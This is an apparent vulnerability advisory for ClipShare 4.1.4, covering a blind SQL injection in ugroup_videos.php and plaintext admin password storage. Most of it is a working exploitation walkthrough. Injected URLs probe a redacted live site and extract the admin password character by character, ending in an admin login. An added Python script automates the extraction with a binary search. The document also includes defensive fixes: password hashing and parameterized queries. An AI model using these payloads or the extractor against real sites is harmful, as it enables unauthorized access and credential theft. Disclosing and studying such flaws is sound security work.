ClipShare 4.1.4 has multiple vulnerabilities

2019-09-12
Affected software: ClipShare - Video Sharing Community Script 4.1.4
Vendor site: http://www.clip-share.com
Vulnerability type: Blind SQL injection and plaintext password storage
AFAIK all versions are affected.
Official demo is also vulnerable: http://www.clipsharedemo.com/ugroup_videos.php?urlkey=%27%20and%203=%273
Last tested: 13 March 2013
Note: to exploit this vulnerability the magic_quotes_gpc directive must be turned off on the server side (php.ini); with it on, the single quote in urlkey is backslash-escaped before it reaches the query.
Vulnerable file:
//ugroup_videos.php
=========================== BEGIN OF ugroup_videos.php ============================================= 

<?php
/***************************
| Software Name : ClipShare - Video Sharing Community Script
| Software Author : Clip-Share.Com / ScriptXperts.Com
| Website : http://www.clip-share.com
| E-mail : office@clip-share.com
|****************************
| This source file is subject to the ClipShare End-User License Agreement, available online at:
| http://www.clip-share.com/video-sharing-script-eula.html
| By using this software, you acknowledge having read this Agreement and agree to be bound thereby.
|******************************
| Copyright (c) 2006-2007 Clip-Share.com. All rights reserved.
|***************************/
require('include/config.php');
require('include/function.php');
// urlkey is read from $_REQUEST with no validation or escaping at all;
// UID, by contrast, at least has to pass is_numeric().
$urlkey = ( isset($_REQUEST['urlkey']) ) ? $_REQUEST['urlkey'] : NULL;
$uid = ( isset($_REQUEST['UID']) && is_numeric($_REQUEST['UID']) ) ? $_REQUEST['UID'] : NULL;
// Injection point: the raw value is concatenated into a quoted string literal,
// so a single quote in urlkey closes the literal and the rest is parsed as SQL.
$sql="SELECT * from group_own WHERE gurl='" .$urlkey. "' limit 1";
$rs = $conn->Execute($sql);
if($rs->recordcount()>0) {
    STemplate::assign('groupname',$rs->fields[gname]);
    //PAGING STARTS
    $page = ( isset($_REQUEST['page']) && is_numeric($_REQUEST['page']) ) ? $_REQUEST['page'] : NULL;
    // GID is taken from the row selected above, not directly from the request.
    $sql = "SELECT count(*) as total from group_mem WHERE GID='" .$rs->fields['GID']. "' limit 1";
    $ars = $conn->Execute($sql);
    $total = ( $ars->fields['total']<=$config['total_per_ini'] ) ? $ars->fields['total'] : $config['total_per_ini'];
    $tpage = ceil($total/$config['items_per_page']);
    $spage = ( $tpage == 0 ) ? $tpage+1 : $tpage;
    // With no page parameter $page is NULL, so $startfrom is negative here.
    $startfrom = ($page-1)*$config['items_per_page'];
    $sql = "SELECT m.*,s.addtime from group_mem as m,signup as s WHERE m.MID=s.UID and m.GID='".$rs->fields['GID']."' limit $startfrom, " .$config['items_per_page'];
    $rs = $conn->execute($sql);
if($rs->recordcount()>0) 
$vdo = $rs->getrows(); 
$start_num = $startfrom+1; 
$end_num = $startfrom+$rs->recordcount(); 
$page_link = ''; 
$type = ( isset($_REQUEST['type']) && $_REQUEST['type'] != '' ) ? "&type=" .$_REQUEST['type'] : NULL; 
for ( $k=1;$k<=$tpage;$k++ ) 
$page_link.="<a href='group_members.php?UID=" .$uid. "&page=" .$k. $type. "'>$k</a>&nbsp;&nbsp;"; 
//END PAGING 
} 
STemplate::assign('err',$err); 
STemplate::assign('msg',$msg); 
STemplate::assign('page',$page); 
STemplate::assign('start_num',$start_num); 
STemplate::assign('end_num',$end_num); 
STemplate::assign('page_link',$page_link); 
STemplate::assign('total',$total); 
STemplate::assign('answers',$vdo); 
STemplate::assign('head_bottom',"grouplinks.tpl"); 
STemplate::display('head1.tpl'); 
STemplate::display('err_msg.tpl'); 
STemplate::display('ugroup_members.tpl'); 
STemplate::display('footer.tpl'); 
STemplate::gzip_encode(); 
?> 

====================END OF ugroup_videos.php========================
Real exploitation example:
Column count probe (ORDER BY N errors out once N exceeds the number of columns in group_own):
http://_REMOVED_/ugroup_videos.php?urlkey=1' order by 14-- 3='3
Boolean oracle. When the injected condition is TRUE the normal page is returned:
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(5=5,0,3))-- 3='3
When it is FALSE nothing is returned (white page):
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(5=2,0,3))-- 3='3
Why it is this way round (an inference from the code above, not stated in the original advisory): a true condition makes IF() return 0, the WHERE clause becomes gurl='1' or 0, no group matches, the if($rs->recordcount()>0) block is skipped and the templates render an ordinary, empty page. A false condition returns 3, gurl='1' or 3 matches every row, the first group comes back and the paging code runs with no page parameter, so $startfrom is negative and the LIMIT clause is invalid SQL. If ADOdb returns false for the failed query and display_errors is off, the following recordcount() call is a fatal error before any template has been output, which would be the blank page. Either way the two responses are distinguishable, which is all a boolean-based blind injection needs.
Plaintext password:
//siteadmin/login.php
============ BEGIN OF siteadmin/login.php ===========================

<?php
include('../include/config.php');
if ( isset($_POST['submit_login']) ) {
    $username = trim($_POST['username']);
    $password = trim($_POST['password']);
    if ( $username == '' or $password == '' ) {
        $err = 'Please provide a username and password!';
    } else {
        $access = false;
        // Input is escaped here, so this file is not itself injectable. The problem is what the
        // query compares against: admin_name and admin_pass are literal svalue rows in sconfig.
        $sql = "SELECT soption FROM sconfig WHERE soption = 'admin_name' AND svalue = '" .mysql_real_escape_string($username). "'";
        $conn->execute($sql);
        if ( $conn->Affected_Rows() == 1 ) {
            // The submitted password is matched verbatim against svalue: no hashing anywhere, so
            // anyone who can read sconfig (for instance via the blind injection above) has the admin password.
            $sql = "SELECT soption FROM sconfig WHERE soption = 'admin_pass' AND svalue = '" .mysql_real_escape_string($password). "'";
            $conn->execute($sql);
            if ( $conn->Affected_Rows() == 1 ) {
                $access = true;
            }
        }
// SNIP //

============ END OF siteadmin/login.php ===========================
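How the admin password could be stored and checked so that a leaked sconfig row is not a usable login. This is an added example, not ClipShare's code: a Python stand-in for the logic in siteadmin/login.php, with a salted PBKDF2-HMAC-SHA256 record in place of the literal svalue comparison and a constant-time digest check. The record layout, the option names as dict keys and the iteration count are this example's own choices.

```python
import base64
import hashlib
import hmac
import os

# Record layout and work factor are this example's own choices (not ClipShare's).
ALGO = "pbkdf2_sha256"
ITERATIONS = 600_000  # PBKDF2-HMAC-SHA256 iterations


def hash_password(password, salt=None):
    """Return a self-describing record 'algo$iterations$salt_b64$digest_b64'.

    A fresh random salt per password means equal passwords get different records
    and precomputed tables are useless; the iteration count makes guessing slow."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return "$".join([ALGO, str(ITERATIONS),
                     base64.b64encode(salt).decode("ascii"),
                     base64.b64encode(digest).decode("ascii")])


def verify_password(stored, candidate):
    """Recompute the digest from the stored salt/iterations and compare in constant time."""
    parts = stored.split("$")
    if len(parts) != 4 or parts[0] != ALGO:
        return False
    _, iterations, salt_b64, digest_b64 = parts
    expected = base64.b64decode(digest_b64)
    actual = hashlib.pbkdf2_hmac("sha256", candidate.encode("utf-8"),
                                 base64.b64decode(salt_b64), int(iterations))
    return hmac.compare_digest(actual, expected)


def admin_login(sconfig, username, password):
    """Stand-in for siteadmin/login.php; sconfig is a dict of soption -> svalue.

    Both values are fetched by their fixed option names and compared in application
    code, instead of asking the database "is there a row whose svalue equals the
    submitted password?" as the original does. Both checks always run."""
    name_ok = hmac.compare_digest(sconfig.get("admin_name", "").encode("utf-8"),
                                  username.encode("utf-8"))
    pass_ok = verify_password(sconfig.get("admin_pass", ""), password)
    return name_ok and pass_ok


if __name__ == "__main__":
    # Constructed sample configuration; the password is the one the advisory recovered.
    record = hash_password("o(2n@b%ha51")
    cfg = {"admin_name": "admin", "admin_pass": record}
    print(record)
    print(admin_login(cfg, "admin", "o(2n@b%ha51"))  # True
    print(admin_login(cfg, "admin", record))         # False: a leaked record is not a password
```

With this layout the blind injection above would still read the admin_pass row, but what comes out is a salted digest that has to be brute-forced offline rather than typed into siteadmin/login.php.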
Confirming sconfig has rows (TRUE):
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(count(`svalue`)!=0,0,3) from sconfig)-- 3='3
sconfig holds 80 rows:
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(count(`svalue`)=80,0,3) from sconfig)-- 3='3
Exactly one admin_name row:
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(count(0)=1,0,3) from sconfig where soption='admin_name')-- 3='3
Extracting the password:
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(length(svalue)='11',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
The password is 11 characters long.
========================================================
1st character: o
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,1,1)='o',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
========================================================
2nd character: (
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,2,1)='(',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
========================================================
3rd character: 2
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,3,1)='2',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
========================================================
4th character: n
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,4,1)='n',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
========================================================
5th character: @
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,5,1)='@',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
========================================================
6th character: b
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,6,1)='b',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
========================================================
7th character: % (verify afterwards)
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,7,1)='%',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
========================================================
8th character: h
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,8,1)='h',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
========================================================
9th character: a
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,9,1)='a',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
========================================================
10th character: 5
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,10,1)='5',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
========================================================
11th character: 1
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,11,1)='1',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
========================================================
The whole string in one comparison:
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,1,15)='o(2n@b%ha51',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
// The password is completely correct; there is no real need to check the ASCII representation (it only raised doubts because it is plaintext). The hex-encoded comparison below confirms it anyway:
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,1,15)=0x6F28326E40622568613531,0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
pass: o(2n@b%ha51
Confirming the admin username:
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(svalue='admin',0,3) from sconfig where soption='admin_name' limit 1 offset 0)-- 3='3
login: admin
pass: o(2n@b%ha51
http://_REMOVED_/siteadmin/
OwnEd.
Tested version (admin panel footer after logging in):
Tuesday, March 12, 2013 | Version: 4.1.4 | Username: admin | Logout
Copyright © 2006-2008 ClipShare. All rights reserved.
/AkaStep
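The character-by-character walk above, automated against an offline stand-in. This is an added example, not the advisory's or ClipShare's code: an in-memory SQLite database models the group_own and sconfig tables with constructed sample rows (including the admin password), vulnerable_lookup reproduces the string-concatenated query from ugroup_videos.php, and safe_lookup is the same query with a bound parameter. MySQL's IF() and MID() become CASE and substr()/unicode() in SQLite; the payload shape `1' or (select ...)-- 3='3` is otherwise the advisory's. It goes beyond the page in two ways: it first runs the 5=5 / 5=2 probe so that a non-injectable parameter is reported as such instead of yielding garbage, and it replaces the per-character equality guesses with a binary search over the code point, about seven requests per character.

```python
import sqlite3

# Constructed sample data, not from the advisory's target. ClipShare keeps admin_pass
# as plaintext in sconfig, which is what turns this leak into a direct admin login.
ADMIN_PASS = "o(2n@b%ha51"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE group_own (GID INTEGER, gurl TEXT, gname TEXT)")
    conn.execute("INSERT INTO group_own VALUES (1, 'funny-clips', 'Funny Clips')")
    conn.execute("CREATE TABLE sconfig (soption TEXT, svalue TEXT)")
    conn.executemany("INSERT INTO sconfig VALUES (?, ?)",
                     [("site_name", "demo"), ("admin_name", "admin"), ("admin_pass", ADMIN_PASS)])
    return conn


def vulnerable_lookup(conn, urlkey):
    # Same shape as ugroup_videos.php: "SELECT * from group_own WHERE gurl='" .$urlkey. "' limit 1"
    return conn.execute("SELECT * FROM group_own WHERE gurl='" + urlkey + "' LIMIT 1").fetchall()


def safe_lookup(conn, urlkey):
    # Hardened form: bound parameter, so quotes in urlkey are data rather than SQL syntax.
    return conn.execute("SELECT * FROM group_own WHERE gurl=? LIMIT 1", (urlkey,)).fetchall()


def payload(condition):
    # Advisory shape: 1' or (select if(COND,0,3))-- 3='3   (IF() written as CASE for SQLite).
    return f"1' or (select case when ({condition}) then 0 else 3 end)-- 3='3"


def condition_holds(conn, lookup, condition):
    """Boolean oracle. A true COND yields 0, "gurl='1' or 0" matches nothing and the PHP
    renders its normal (empty) page; a false COND yields 3, "or 3" matches a row and,
    per the advisory, the page comes back blank. Row count stands in for that difference."""
    return len(lookup(conn, payload(condition))) == 0


def extract_admin_pass(conn, lookup=vulnerable_lookup, max_len=64):
    # Step 1 (advisory: 5=5 vs 5=2): confirm the condition actually steers the response.
    if condition_holds(conn, lookup, "5=5") == condition_holds(conn, lookup, "5=2"):
        return None  # parameter is not injectable (e.g. safe_lookup)
    target = "(select svalue from sconfig where soption='admin_pass' limit 1)"
    # Step 2 (advisory: length(svalue)='11'): find the password length.
    length = next((n for n in range(1, max_len + 1)
                   if condition_holds(conn, lookup, f"length({target})={n}")), None)
    if length is None:
        return None
    # Step 3: one character per position. The advisory guesses literal characters; this
    # bisects the printable ASCII range (32..126) on the code point instead.
    out = []
    for pos in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if condition_holds(conn, lookup, f"unicode(substr({target},{pos},1))>{mid}"):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", extract_admin_pass(db, vulnerable_lookup))  # o(2n@b%ha51
    print("parameterized:", extract_admin_pass(db, safe_lookup))     # None
```

Against safe_lookup the 5=5 and 5=2 payloads produce the same (empty) result, so the function returns None: the quote in urlkey never leaves the string literal. The PHP equivalent of safe_lookup is a prepared statement (PDO or mysqli) for the gurl lookup; the second half of the fix is to stop storing admin_pass in plaintext, so that whatever a reader of sconfig extracts is not itself a login.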

 
